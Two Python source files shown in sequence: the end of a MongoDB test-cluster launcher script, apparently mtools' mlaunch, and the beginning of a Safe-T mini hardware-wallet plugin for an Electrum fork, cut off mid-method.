for shard in self._get_shard_names(self.loaded_args):
tags = []
replicaset = 'replicaset' in self.loaded_args and self.loaded_args['replicaset']
padding = ''
if shard:
print_docs.append(shard)
tags.append(shard)
padding = ' '
if replicaset:
# primary
primary = self.get_tagged(tags + ['primary', 'running'])
if len(primary) > 0:
node = list(primary)[0]
print_docs.append( OrderedDict([ ('process', padding+'primary'), ('port', node), ('status', 'running' if self.cluster_running[node] else 'down') ]) )
# secondaries
secondaries = self.get_tagged(tags + ['secondary', 'running'])
for node in sorted(secondaries):
print_docs.append( OrderedDict([ ('process', padding+'secondary'), ('port', node), ('status', 'running' if self.cluster_running[node] else 'down') ]) )
# data-bearing nodes that are down or not in the replica set yet
mongods = self.get_tagged(tags + ['mongod'])
arbiters = self.get_tagged(tags + ['arbiter'])
nodes = sorted(mongods - primary - secondaries - arbiters)
for node in nodes:
print_docs.append( OrderedDict([ ('process', padding+'mongod'), ('port', node), ('status', 'running' if self.cluster_running[node] else 'down') ]) )
# arbiters
for node in arbiters:
print_docs.append( OrderedDict([ ('process', padding+'arbiter'), ('port', node), ('status', 'running' if self.cluster_running[node] else 'down') ]) )
else:
nodes = self.get_tagged(tags + ['mongod'])
if len(nodes) > 0:
node = nodes.pop()
print_docs.append( OrderedDict([ ('process', padding+'single'), ('port', node), ('status', 'running' if self.cluster_running[node] else 'down') ]) )
if shard:
print_docs.append(None)
processes = self._get_processes()
startup = self.startup_info
# print tags as well
for doc in filter(lambda x: type(x) == OrderedDict, print_docs):
try:
doc['pid'] = processes[doc['port']].pid
except KeyError:
doc['pid'] = '-'
if self.args['verbose'] or self.args['tags']:
tags = self.get_tags_of_port(doc['port'])
doc['tags'] = ', '.join(tags)
if self.args['startup']:
try:
# first try running process (startup may be modified via start command)
doc['startup command'] = ' '.join(processes[doc['port']].cmdline())
except KeyError:
# if not running, use stored startup_info
doc['startup command'] = startup[str(doc['port'])]
print_docs.append( None )
print
print_table(print_docs)
def kill(self):
self.discover()
# get matching tags, can only send signals to running nodes
matches = self._get_ports_from_args(self.args, 'running')
processes = self._get_processes()
# convert signal to int
sig = self.args['signal']
if type(sig) == int:
pass
elif isinstance(sig, str):
try:
sig = int(sig)
except ValueError as e:
try:
sig = getattr(signal, sig)
except AttributeError as e:
raise SystemExit("can't parse signal '%s', use integer or signal name (SIGxxx)." % sig)
for port in processes:
# only send signal to matching processes
if port in matches:
p = processes[port]
p.send_signal(sig)
if self.args['verbose']:
print " %s on port %i, pid=%i" % (p.name, port, p.pid)
print "sent signal %s to %i process%s." % (sig, len(matches), '' if len(matches) == 1 else 'es')
# there is a very brief period in which nodes are not reachable anymore, but the
# port is not torn down fully yet and an immediate start command would fail. This
# very short sleep prevents that case, and it is practically not noticable by users
time.sleep(0.1)
# refresh discover
self.discover()
def restart(self):
# stop nodes via stop command
self.stop()
# there is a very brief period in which nodes are not reachable anymore, but the
# port is not torn down fully yet and an immediate start command would fail. This
# very short sleep prevents that case, and it is practically not noticable by users
time.sleep(0.1)
# refresh discover
self.discover()
# start nodes again via start command
self.start()
# --- below are api helper methods, can be called after creating an MLaunchTool() object
def discover(self):
""" This method will go out to each of the processes and get their state. It builds the
self.cluster_tree, self.cluster_tags, self.cluster_running data structures, needed
for sub-commands start, stop, list.
"""
# need self.args['command'] so fail if it's not available
if not self.args or not 'command' in self.args or not self.args['command']:
return
# load .mlaunch_startup file for start, stop, list, use current parameters for init
if self.args['command'] == 'init':
self.loaded_args, self.loaded_unknown_args = self.args, self.unknown_args
else:
if not self._load_parameters():
raise SystemExit("can't read %s/.mlaunch_startup, use 'mlaunch init ...' first." % self.dir)
# reset cluster_* variables
self.cluster_tree = {}
self.cluster_tags = defaultdict(list)
self.cluster_running = {}
# get shard names
shard_names = self._get_shard_names(self.loaded_args)
# some shortcut variables
is_sharded = 'sharded' in self.loaded_args and self.loaded_args['sharded'] != None
is_replicaset = 'replicaset' in self.loaded_args and self.loaded_args['replicaset']
is_csrs = 'csrs' in self.loaded_args and self.loaded_args['csrs']
is_single = 'single' in self.loaded_args and self.loaded_args['single']
has_arbiter = 'arbiter' in self.loaded_args and self.loaded_args['arbiter']
# determine number of nodes to inspect
if is_sharded:
num_config = self.loaded_args['config']
# at least one temp. mongos for adding shards, will be killed later on
num_mongos = max(1, self.loaded_args['mongos'])
num_shards = len(shard_names)
else:
num_shards = 1
num_config = 0
num_mongos = 0
num_nodes_per_shard = self.loaded_args['nodes'] if is_replicaset else 1
if has_arbiter:
num_nodes_per_shard += 1
num_nodes = num_shards * num_nodes_per_shard + num_config + num_mongos
current_port = self.loaded_args['port']
# tag all nodes with 'all'
self.cluster_tags['all'].extend ( range(current_port, current_port + num_nodes) )
# tag all nodes with their port number (as string) and whether they are running
for port in range(current_port, current_port + num_nodes):
self.cluster_tags[str(port)].append(port)
running = self.is_running(port)
self.cluster_running[port] = running
self.cluster_tags['running' if running else 'down'].append(port)
# find all mongos
for i in range(num_mongos):
port = i+current_port
# add mongos to cluster tree
self.cluster_tree.setdefault( 'mongos', [] ).append( port )
# add mongos to tags
self.cluster_tags['mongos'].append( port )
current_port += num_mongos
# find all mongods (sharded, replicaset or single)
if shard_names == None:
shard_names = [ None ]
for shard in shard_names:
port_range = range(current_port, current_port + num_nodes_per_shard)
# all of these are mongod nodes
self.cluster_tags['mongod'].extend( port_range )
if shard:
# if this is a shard, store in cluster_tree and tag shard name
self.cluster_tree.setdefault( 'shard', [] ).append( port_range )
self.cluster_tags[shard].extend( port_range )
if is_replicaset:
# get replica set states
rs_name = shard if shard else self.loaded_args['name']
try:
mrsc = Connection( ','.join( 'localhost:%i'%i for i in port_range ), replicaSet=rs_name )
# primary, secondaries, arbiters
# @todo: this is no longer working because MongoClient is now non-blocking
if mrsc.primary:
self.cluster_tags['primary'].append( mrsc.primary[1] )
self.cluster_tags['secondary'].extend( map(itemgetter(1), mrsc.secondaries) )
self.cluster_tags['arbiter'].extend( map(itemgetter(1), mrsc.arbiters) )
# secondaries in cluster_tree (order is now important)
self.cluster_tree.setdefault( 'secondary', [] )
for i, secondary in enumerate(sorted(map(itemgetter(1), mrsc.secondaries))):
if len(self.cluster_tree['secondary']) <= i:
self.cluster_tree['secondary'].append([])
self.cluster_tree['secondary'][i].append(secondary)
except (ConnectionFailure, ConfigurationError):
pass
elif is_single:
self.cluster_tags['single'].append( current_port )
# increase current_port
current_port += num_nodes_per_shard
# add config server to cluster tree
self.cluster_tree.setdefault( 'config', [] ).append( port )
for i in range(num_config):
port = i+current_port
try:
mc = MongoConnection('localhost:%i'%port)
mc.admin.command('ping')
running = True
except ConnectionFailure:
# node not reachable
running = False
# add config server to cluster tree
self.cluster_tree.setdefault( 'config', [] ).append( port )
# add config server to tags
self.cluster_tags['config'].append( port )
self.cluster_tags['mongod'].append( port )
current_port += num_mongos
def is_running(self, port):
""" returns if a host on a specific port is running. """
try:
con = MongoConnection('localhost:%s' % port)
con.admin.command('ping')
return True
except (AutoReconnect, ConnectionFailure):
return False
def get_tagged(self, tags):
""" The format for the tags list is tuples for tags: mongos, config, shard, secondary tags
of the form (tag, number), e.g. ('mongos', 2) which references the second mongos
in the list. For all other tags, it is simply the string, e.g. 'primary'.
"""
# if tags is a simple string, make it a list (note: tuples like ('mongos', 2) must be in a surrounding list)
if not hasattr(tags, '__iter__') and type(tags) == str:
tags = [ tags ]
nodes = set(self.cluster_tags['all'])
for tag in tags:
if re.match(r"\w+ \d{1,2}", tag):
# special case for tuple tags: mongos, config, shard, secondary. These can contain a number
tag, number = tag.split()
try:
branch = self.cluster_tree[tag][int(number)-1]
except (IndexError, KeyError):
continue
if hasattr(branch, '__iter__'):
subset = set(branch)
else:
subset = set([branch])
else:
# otherwise use tags dict to get the subset
subset = set(self.cluster_tags[tag])
nodes = nodes.intersection(subset)
return nodes
def get_tags_of_port(self, port):
""" get all tags related to a given port (inverse of what is stored in self.cluster_tags) """
return sorted([tag for tag in self.cluster_tags if port in self.cluster_tags[tag] ])
def wait_for(self, ports, interval=1.0, timeout=30, to_start=True):
""" Given a list of ports, spawns up threads that will ping the host on each port concurrently.
Returns when all hosts are running (if to_start=True) / shut down (if to_start=False)
"""
threads = []
queue = Queue.Queue()
for port in ports:
threads.append(threading.Thread(target=wait_for_host, args=(port, interval, timeout, to_start, queue)))
if self.args and 'verbose' in self.args and self.args['verbose']:
print "waiting for nodes %s..." % ('to start' if to_start else 'to shutdown')
for thread in threads:
thread.start()
for thread in threads:
thread.join()
# get all results back and return tuple
return tuple(queue.get_nowait() for _ in ports)
# --- below here are internal helper methods, should not be called externally ---
def _convert_u2b(self, obj):
""" helper method to convert unicode back to plain text. """
if isinstance(obj, dict):
return dict([(self._convert_u2b(key), self._convert_u2b(value)) for key, value in obj.iteritems()])
elif isinstance(obj, list):
return [self._convert_u2b(element) for element in obj]
elif isinstance(obj, unicode):
return obj.encode('utf-8')
else:
return obj
def _load_parameters(self):
""" tries to load the .mlaunch_startup file that exists in each datadir.
Handles different protocol versions.
"""
datapath = self.dir
startup_file = os.path.join(datapath, '.mlaunch_startup')
if not os.path.exists(startup_file):
return False
in_dict = self._convert_u2b(json.load(open(startup_file, 'r')))
# handle legacy version without versioned protocol
if 'protocol_version' not in in_dict:
in_dict['protocol_version'] = 1
self.loaded_args = in_dict
self.startup_info = {}
# hostname was added recently
self.loaded_args['hostname'] = socket.gethostname()
elif in_dict['protocol_version'] == 2:
self.startup_info = in_dict['startup_info']
self.loaded_unknown_args = in_dict['unknown_args']
self.loaded_args = in_dict['parsed_args']
# changed 'authentication' to 'auth', if present (from old env) rename
if 'authentication' in self.loaded_args:
self.loaded_args['auth'] = self.loaded_args['authentication']
del self.loaded_args['authentication']
return True
def _store_parameters(self):
""" stores the startup parameters and config in the .mlaunch_startup file in the datadir. """
datapath = self.dir
out_dict = {
'protocol_version': 2,
'mtools_version': __version__,
'parsed_args': self.args,
'unknown_args': self.unknown_args,
'startup_info': self.startup_info
}
if not os.path.exists(datapath):
os.makedirs(datapath)
try:
json.dump(out_dict, open(os.path.join(datapath, '.mlaunch_startup'), 'w'), -1)
except Exception:
pass
def _create_paths(self, basedir, name=None):
""" create datadir and subdir paths. """
if name:
datapath = os.path.join(basedir, name)
else:
datapath = basedir
dbpath = os.path.join(datapath, 'db')
if not os.path.exists(dbpath):
os.makedirs(dbpath)
if self.args['verbose']:
print 'creating directory: %s'%dbpath
return datapath
def _get_ports_from_args(self, args, extra_tag):
tags = []
if 'tags' not in args:
args['tags'] = []
for tag1, tag2 in zip(args['tags'][:-1], args['tags'][1:]):
if re.match('^\d{1,2}$', tag1):
print "warning: ignoring numeric value '%s'" % tag1
continue
if re.match('^\d{1,2}$', tag2):
if tag1 in ['mongos', 'shard', 'secondary', 'config']:
# combine tag with number, separate by string
tags.append( '%s %s' % (tag1, tag2) )
continue
else:
print "warning: ignoring numeric value '%s' after '%s'" % (tag2, tag1)
tags.append( tag1 )
if len(args['tags']) > 0:
tag = args['tags'][-1]
if not re.match('^\d{1,2}$', tag):
tags.append(tag)
tags.append(extra_tag)
matches = self.get_tagged(tags)
return matches
def _filter_valid_arguments(self, arguments, binary="mongod", config=False):
""" check which of the list of arguments is accepted by the specified binary (mongod, mongos).
returns a list of accepted arguments. If an argument does not start with '-' but its preceding
argument was accepted, then it is accepted as well. Example ['--slowms', '1000'] both arguments
would be accepted for a mongod.
"""
if self.args and self.args['binarypath']:
binary = os.path.join( self.args['binarypath'], binary)
# get the help list of the binary
ret = subprocess.Popen(['%s --help'%binary], stderr=subprocess.STDOUT, stdout=subprocess.PIPE, shell=True)
out, err = ret.communicate()
accepted_arguments = []
# extract all arguments starting with a '-'
for line in [option for option in out.split('\n')]:
line = line.lstrip()
if line.startswith('-'):
argument = line.split()[0]
# exception: don't allow --oplogSize for config servers
if config and argument == '--oplogSize':
continue
accepted_arguments.append(argument)
# add undocumented option
if binary == "mongod":
accepted_arguments.append('--wiredTigerEngineConfigString')
# filter valid arguments
result = []
for i, arg in enumerate(arguments):
if arg.startswith('-'):
# check if the binary accepts this argument or special case -vvv for any number of v
if arg in accepted_arguments or re.match(r'-v+', arg):
result.append(arg)
elif i > 0 and arguments[i-1] in result:
# if it doesn't start with a '-', it could be the value of the last argument, e.g. `--slowms 1000`
result.append(arg)
# return valid arguments as joined string
return ' '.join(result)
def _get_shard_names(self, args):
""" get the shard names based on the self.args['sharded'] parameter. If it's a number, create
shard names of type shard##, where ## is a 2-digit number. Returns a list [ None ] if
no shards are present.
"""
if 'sharded' in args and args['sharded']:
if len(args['sharded']) == 1:
try:
# --sharded was a number, name shards shard01, shard02, ... (only works with replica sets)
n_shards = int(args['sharded'][0])
shard_names = ['shard%.2i'%(i+1) for i in range(n_shards)]
except ValueError, e:
# --sharded was a string, use it as name for the one shard
shard_names = args['sharded']
else:
shard_names = args['sharded']
else:
shard_names = [ None ]
return shard_names
def _start_on_ports(self, ports, wait=False, overrideAuth=False):
threads = []
if overrideAuth and self.args['verbose']:
print "creating cluster without auth for setup, will enable auth at the end..."
for port in ports:
command_str = self.startup_info[str(port)]
if overrideAuth:
# this is to set up sharded clusters without auth first, then relaunch with auth
command_str = re.sub(r'--keyFile \S+', '', command_str)
ret = subprocess.call([command_str], stderr=subprocess.STDOUT, stdout=subprocess.PIPE, shell=True)
binary = command_str.split()[0]
if '--configsvr' in command_str:
binary = 'config server'
if self.args['verbose']:
print "launching: %s" % command_str
else:
print "launching: %s on port %s" % (binary, port)
if ret > 0:
raise SystemExit("can't start process, return code %i. tried to launch: %s"% (ret, command_str))
if wait:
self.wait_for(ports)
def _initiate_replset(self, port, name, maxwait=30):
# initiate replica set
if not self.args['replicaset']:
return
con = MongoConnection('localhost:%i'%port)
try:
rs_status = con['admin'].command({'replSetGetStatus': 1})
except OperationFailure, e:
# not initiated yet
for i in range(maxwait):
try:
con['admin'].command({'replSetInitiate':self.config_docs[name]})
break
except OperationFailure, e:
print e.message, " - will retry"
time.sleep(1)
if self.args['verbose']:
print "initializing replica set '%s' with configuration: %s" % (name, self.config_docs[name])
print "replica set '%s' initialized." % name
def _add_user(self, port, name, password, database, roles):
con = MongoConnection('localhost:%i'%port)
try:
con[database].add_user(name, password=password, roles=roles)
except OperationFailure as e:
pass
except TypeError as e:
if pymongo_version < (2, 5, 0):
con[database].add_user(name, password=password)
warnings.warn('Your pymongo version is too old to support auth roles. Added a legacy user with root access. To support roles, you need to upgrade to pymongo >= 2.5.0')
else:
raise e
def _get_processes(self):
all_ports = self.get_tagged('running')
process_dict = {}
for p in psutil.process_iter():
# deal with zombie process errors in OSX
try:
name = p.name()
except psutil.NoSuchProcess:
continue
# skip all but mongod / mongos
if name not in ['mongos', 'mongod']:
continue
port = None
for possible_port in self.startup_info:
# compare ports based on command line argument
startup = self.startup_info[possible_port].split()
try:
p_port = p.cmdline()[p.cmdline().index('--port')+1]
startup_port = startup[startup.index('--port')+1]
except ValueError:
continue
if str(p_port) == str(startup_port):
port = int(possible_port)
break
# only consider processes belonging to this environment
if port in all_ports:
process_dict[port] = p
return process_dict
def _wait_for_primary(self, max_wait=120):
for i in range(max_wait):
self.discover()
if "primary" in self.cluster_tags and self.cluster_tags['primary']:
return True
time.sleep(1)
return False
# --- below are command line constructor methods, that build the command line strings to be called
def _construct_cmdlines(self):
""" This is the top-level _construct_* method. From here, it will branch out to
the different cases: _construct_sharded, _construct_replicaset, _construct_single. These
can themselves call each other (for example sharded needs to create the shards with
either replicaset or single node). At the lowest level, the construct_mongod, _mongos, _config
will create the actual command line strings and store them in self.startup_info.
"""
if self.args['sharded']:
# construct startup string for sharded environments
self._construct_sharded()
elif self.args['single']:
# construct startup string for single node environment
self._construct_single(self.dir, self.args['port'])
elif self.args['replicaset']:
# construct startup strings for a non-sharded replica set
self._construct_replset(self.dir, self.args['port'], self.args['name'])
# discover current setup
self.discover()
def _construct_sharded(self):
""" construct command line strings for a sharded cluster. """
num_mongos = self.args['mongos'] if self.args['mongos'] > 0 else 1
shard_names = self._get_shard_names(self.args)
# create shards as stand-alones or replica sets
nextport = self.args['port'] + num_mongos
for shard in shard_names:
if self.args['single']:
self.shard_connection_str.append( self._construct_single(self.dir, nextport, name=shard) )
nextport += 1
elif self.args['replicaset']:
self.shard_connection_str.append( self._construct_replset(self.dir, nextport, shard) )
nextport += self.args['nodes']
if self.args['arbiter']:
nextport += 1
# start up config server(s)
config_string = []
config_names = ['config1', 'config2', 'config3'] if self.args['config'] == 3 else ['config']
if self.args['csrs']:
config_string.append(self._construct_config(self.dir, nextport, "configRepl", True))
else:
for name in config_names:
self._construct_config(self.dir, nextport, name)
config_string.append('%s:%i'%(self.args['hostname'], nextport))
nextport += 1
# multiple mongos use <datadir>/mongos/ as subdir for log files
if num_mongos > 1:
mongosdir = os.path.join(self.dir, 'mongos')
if not os.path.exists(mongosdir):
if self.args['verbose']:
print "creating directory: %s" % mongosdir
os.makedirs(mongosdir)
# start up mongos, but put them to the front of the port range
nextport = self.args['port']
for i in range(num_mongos):
if num_mongos > 1:
mongos_logfile = 'mongos/mongos_%i.log' % nextport
else:
mongos_logfile = 'mongos.log'
self._construct_mongos(os.path.join(self.dir, mongos_logfile), nextport, ','.join(config_string))
nextport += 1
def _construct_replset(self, basedir, portstart, name, extra=''):
""" construct command line strings for a replicaset, either for sharded cluster or by itself. """
self.config_docs[name] = {'_id':name, 'members':[]}
# Corner case for csrs to calculate the number of nodes by number of configservers
if extra == '--configsvr':
num_nodes = range(self.args['config'])
else:
num_nodes = range(self.args['nodes'])
for i in num_nodes:
datapath = self._create_paths(basedir, '%s/rs%i'%(name, i+1))
self._construct_mongod(os.path.join(datapath, 'db'), os.path.join(datapath, 'mongod.log'), portstart+i, replset=name, extra=extra)
host = '%s:%i'%(self.args['hostname'], portstart+i)
self.config_docs[name]['members'].append({'_id':len(self.config_docs[name]['members']), 'host':host, 'votes':int(len(self.config_docs[name]['members']) < 7 - int(self.args['arbiter']))})
# launch arbiter if True
if self.args['arbiter']:
datapath = self._create_paths(basedir, '%s/arb'%(name))
self._construct_mongod(os.path.join(datapath, 'db'), os.path.join(datapath, 'mongod.log'), portstart+self.args['nodes'], replset=name)
host = '%s:%i'%(self.args['hostname'], portstart+self.args['nodes'])
self.config_docs[name]['members'].append({'_id':len(self.config_docs[name]['members']), 'host':host, 'arbiterOnly': True})
return name + '/' + ','.join([c['host'] for c in self.config_docs[name]['members']])
def _construct_config(self, basedir, port, name=None, isReplSet=False):
""" construct command line strings for a config server """
if isReplSet:
return self._construct_replset(basedir, port, name, extra='--configsvr')
else:
datapath = self._create_paths(basedir, name)
self._construct_mongod(os.path.join(datapath, 'db'), os.path.join(datapath, 'mongod.log'), port, replset=None, extra='--configsvr')
def _construct_single(self, basedir, port, name=None):
""" construct command line strings for a single node, either for shards or as a stand-alone. """
datapath = self._create_paths(basedir, name)
self._construct_mongod(os.path.join(datapath, 'db'), os.path.join(datapath, 'mongod.log'), port, replset=None)
host = '%s:%i'%(self.args['hostname'], port)
return host
def _construct_mongod(self, dbpath, logpath, port, replset=None, extra=''):
""" construct command line strings for mongod process. """
rs_param = ''
if replset:
rs_param = '--replSet %s'%replset
auth_param = ''
if self.args['auth']:
key_path = os.path.abspath(os.path.join(self.dir, 'keyfile'))
auth_param = '--keyFile %s'%key_path
if self.unknown_args:
config = '--configsvr' in extra
extra = self._filter_valid_arguments(self.unknown_args, "mongod", config=config) + ' ' + extra
path = self.args['binarypath'] or ''
command_str = "%s %s --dbpath %s --logpath %s --port %i --logappend --fork %s %s"%(os.path.join(path, 'mongod'), rs_param, dbpath, logpath, port, auth_param, extra)
# store parameters in startup_info
self.startup_info[str(port)] = command_str
def _construct_mongos(self, logpath, port, configdb):
""" construct command line strings for a mongos process. """
extra = ''
out = subprocess.PIPE
if self.args['verbose']:
out = None
auth_param = ''
if self.args['auth']:
key_path = os.path.abspath(os.path.join(self.dir, 'keyfile'))
auth_param = '--keyFile %s'%key_path
if self.unknown_args:
extra = self._filter_valid_arguments(self.unknown_args, "mongos") + extra
path = self.args['binarypath'] or ''
command_str = "%s --logpath %s --port %i --configdb %s --logappend %s %s --fork"%(os.path.join(path, 'mongos'), logpath, port, configdb, auth_param, extra)
# store parameters in startup_info
self.startup_info[str(port)] = command_str
def _read_key_file(self):
with open(os.path.join(self.dir, 'keyfile'), 'r') as f:
return ''.join(f.readlines())
def main():
tool = MLaunchTool()
tool.run()
if __name__ == '__main__':
sys.exit(main())
|
safe_t.py
|
from binascii import hexlify, unhexlify
import traceback
import sys
from electrum_mona.util import bfh, bh2u, versiontuple, UserCancelled, UserFacingException
from electrum_mona.bitcoin import TYPE_ADDRESS, TYPE_SCRIPT
from electrum_mona.bip32 import BIP32Node
from electrum_mona import constants
from electrum_mona.i18n import _
from electrum_mona.plugin import Device
from electrum_mona.transaction import deserialize, Transaction
from electrum_mona.keystore import Hardware_KeyStore, is_xpubkey, parse_xpubkey
from electrum_mona.base_wizard import ScriptTypeNotSupported
from ..hw_wallet import HW_PluginBase
from ..hw_wallet.plugin import is_any_tx_output_on_change_branch, trezor_validate_op_return_output_and_get_data
# Safe-T mini initialization methods
TIM_NEW, TIM_RECOVER, TIM_MNEMONIC, TIM_PRIVKEY = range(0, 4)
class SafeTKeyStore(Hardware_KeyStore):
hw_type = 'safe_t'
device = 'Safe-T mini'
def get_derivation(self):
return self.derivation
def get_client(self, force_pair=True):
return self.plugin.get_client(self, force_pair)
def decrypt_message(self, sequence, message, password):
raise UserFacingException(_('Encryption and decryption are not implemented by {}').format(self.device))
def sign_message(self, sequence, message, password):
client = self.get_client()
address_path = self.get_derivation() + "/%d/%d"%sequence
address_n = client.expand_path(address_path)
msg_sig = client.sign_message(self.plugin.get_coin_name(), address_n, message)
return msg_sig.signature
def sign_transaction(self, tx, password):
if tx.is_complete():
return
# previous transactions used as inputs
prev_tx = {}
# path of the xpubs that are involved
xpub_path = {}
for txin in tx.inputs():
pubkeys, x_pubkeys = tx.get_sorted_pubkeys(txin)
tx_hash = txin['prevout_hash']
if txin.get('prev_tx') is None and not Transaction.is_segwit_input(txin):
raise UserFacingException(_('Offline signing with {} is not supported for legacy inputs.').format(self.device))
prev_tx[tx_hash] = txin['prev_tx']
for x_pubkey in x_pubkeys:
if not is_xpubkey(x_pubkey):
continue
xpub, s = parse_xpubkey(x_pubkey)
if xpub == self.get_master_public_key():
xpub_path[xpub] = self.get_derivation()
self.plugin.sign_transaction(self, tx, prev_tx, xpub_path)
class SafeTPlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, types
firmware_URL = 'https://safe-t.io'
libraries_URL = 'https://github.com/archos-safe-t/python-safet'
minimum_firmware = (1, 0, 5)
keystore_class = SafeTKeyStore
minimum_library = (0, 1, 0)
SUPPORTED_XTYPES = ('standard', 'p2wpkh-p2sh', 'p2wpkh', 'p2wsh-p2sh', 'p2wsh')
MAX_LABEL_LEN = 32
def __init__(self, parent, config, name):
HW_PluginBase.__init__(self, parent, config, name)
self.libraries_available = self.check_libraries_available()
if not self.libraries_available:
return
from . import client
from . import transport
import safetlib.messages
self.client_class = client.SafeTClient
self.types = safetlib.messages
self.DEVICE_IDS = ('Safe-T mini',)
self.transport_handler = transport.SafeTTransport()
self.device_manager().register_enumerate_func(self.enumerate)
def get_library_version(self):
import safetlib
try:
return safetlib.__version__
except AttributeError:
return 'unknown'
def enumerate(self):
devices = self.transport_handler.enumerate_devices()
return [Device(path=d.get_path(),
interface_number=-1,
id_=d.get_path(),
product_key='Safe-T mini',
usage_page=0,
transport_ui_string=d.get_path())
for d in devices]
def create_client(self, device, handler):
try:
self.logger.info(f"connecting to device at {device.path}")
transport = self.transport_handler.get_transport(device.path)
except BaseException as e:
self.logger.info(f"cannot connect at {device.path} {e}")
return None
if not transport:
self.logger.info(f"cannot connect at {device.path}")
return
self.logger.info(f"connected to device at {device.path}")
client = self.client_class(transport, handler, self)
# Try a ping for device sanity
try:
client.ping('t')
except BaseException as e:
self.logger.info(f"ping failed {e}")
return None
if not client.atleast_version(*self.minimum_firmware):
msg = (_('Outdated {} firmware for device labelled {}. Please '
'download the updated firmware from {}')
.format(self.device, client.label(), self.firmware_URL))
self.logger.info(msg)
if handler:
handler.show_error(msg)
else:
raise UserFacingException(msg)
return None
return client
def get_client(self, keystore, force_pair=True):
devmgr = self.device_manager()
handler = keystore.handler
with devmgr.hid_lock:
client = devmgr.client_for_keystore(self, handler, keystore, force_pair)
# returns the client for a given keystore. can use xpub
if client:
client.used()
return client
def get_coin_name(self):
return "Testnet" if constants.net.TESTNET else "ZCore"
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your {}.\n\n"
"The first two methods are secure as no secret information "
"is entered into your computer.\n\n"
"For the last two methods you input secrets on your keyboard "
"and upload them to your {}, and so you should "
"only do those on a computer you know to be trustworthy "
"and free of malware."
).format(self.device, self.device)
choices = [
# Must be short as QT doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
(TIM_MNEMONIC, _("Upload a BIP39 mnemonic to generate the seed")),
(TIM_PRIVKEY, _("Upload a master private key"))
]
def f(method):
import threading
settings = self.request_safe_t_init_settings(wizard, method, self.device)
t = threading.Thread(target=self._initialize_device_safe, args=(settings, method, device_id, wizard, handler))
t.setDaemon(True)
t.start()
exit_code = wizard.loop.exec_()
if exit_code != 0:
# this method (initialize_device) was called with the expectation
# of leaving the device in an initialized state when finishing.
# signal that this is not the case:
raise UserCancelled()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device_safe(self, settings, method, device_id, wizard, handler):
exit_code = 0
try:
self._initialize_device(settings, method, device_id, wizard, handler)
except UserCancelled:
exit_code = 1
except BaseException as e:
self.logger.exception('')
handler.show_error(repr(e))
exit_code = 1
finally:
wizard.loop.exit(exit_code)
def _initialize_device(self, settings, method, device_id, wizard, handler):
item, label, pin_protection, passphrase_protection = settings
if method == TIM_RECOVER:
handler.show_error(_(
"You will be asked to enter 24 words regardless of your "
"seed's actual length. If you enter a word incorrectly or "
"misspell it, you cannot change it or go back - you will need "
"to start again from the beginning.\n\nSo please enter "
"the words carefully!"),
blocking=True)
language = 'english'
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
if not client:
raise Exception(_("The device was disconnected."))
if method == TIM_NEW:
strength = 64 * (item + 2) # 128, 192 or 256
u2f_counter = 0
skip_backup = False
client.reset_device(True, strength, passphrase_protection,
pin_protection, label, language,
u2f_counter, skip_backup)
elif method == TIM_RECOVER:
word_count = 6 * (item + 2) # 12, 18 or 24
client.step = 0
client.recovery_device(word_count, passphrase_protection,
pin_protection, label, language)
elif method == TIM_MNEMONIC:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_mnemonic(str(item), pin,
passphrase_protection,
label, language)
else:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_xprv(item, pin, passphrase_protection,
label, language)
def _make_node_path(self, xpub, address_n):
bip32node = BIP32Node.from_xkey(xpub)
node = self.types.HDNodeType(
depth=bip32node.depth,
fingerprint=int.from_bytes(bip32node.fingerprint, 'big'),
child_num=int.from_bytes(bip32node.child_number, 'big'),
chain_code=bip32node.chaincode,
public_key=bip32node.eckey.get_public_key_bytes(compressed=True),
)
return self.types.HDNodePathType(node=node, address_n=address_n)
def setup_device(self, device_info, wizard, purpose):
devmgr = self.device_manager()
device_id = device_info.device.id_
client = devmgr.client_by_id(device_id)
if client is None:
raise UserFacingException(_('Failed to create a client for this device.') + '\n' +
_('Make sure it is in the correct state.'))
# fixme: we should use: client.handler = wizard
client.handler = self.create_handler(wizard)
if not device_info.initialized:
self.initialize_device(device_id, wizard, client.handler)
client.get_xpub('m', 'standard')
client.used()
def get_xpub(self, device_id, derivation, xtype, wizard):
if xtype not in self.SUPPORTED_XTYPES:
raise ScriptTypeNotSupported(_('This type of script is not supported with {}.').format(self.device))
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
client.handler = wizard
xpub = client.get_xpub(derivation, xtype)
client.used()
return xpub
def get_safet_input_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return self.types.InputScriptType.SPENDWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return self.types.InputScriptType.SPENDP2SHWITNESS
if electrum_txin_type in ('p2pkh', ):
return self.types.InputScriptType.SPENDADDRESS
if electrum_txin_type in ('p2sh', ):
return self.types.InputScriptType.SPENDMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def get_safet_output_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return self.types.OutputScriptType.PAYTOWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return self.types.OutputScriptType.PAYTOP2SHWITNESS
if electrum_txin_type in ('p2pkh', ):
return self.types.OutputScriptType.PAYTOADDRESS
if electrum_txin_type in ('p2sh', ):
return self.types.OutputScriptType.PAYTOMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def sign_transaction(self, keystore, tx, prev_tx, xpub_path):
self.prev_tx = prev_tx
self.xpub_path = xpub_path
client = self.get_client(keystore)
inputs = self.tx_inputs(tx, True)
outputs = self.tx_outputs(keystore.get_derivation(), tx)
signatures = client.sign_tx(self.get_coin_name(), inputs, outputs,
lock_time=tx.locktime, version=tx.version)[0]
signatures = [(bh2u(x) + '01') for x in signatures]
tx.update_signatures(signatures)
def show_address(self, wallet, address, keystore=None):
if keystore is None:
keystore = wallet.get_keystore()
if not self.show_address_helper(wallet, address, keystore):
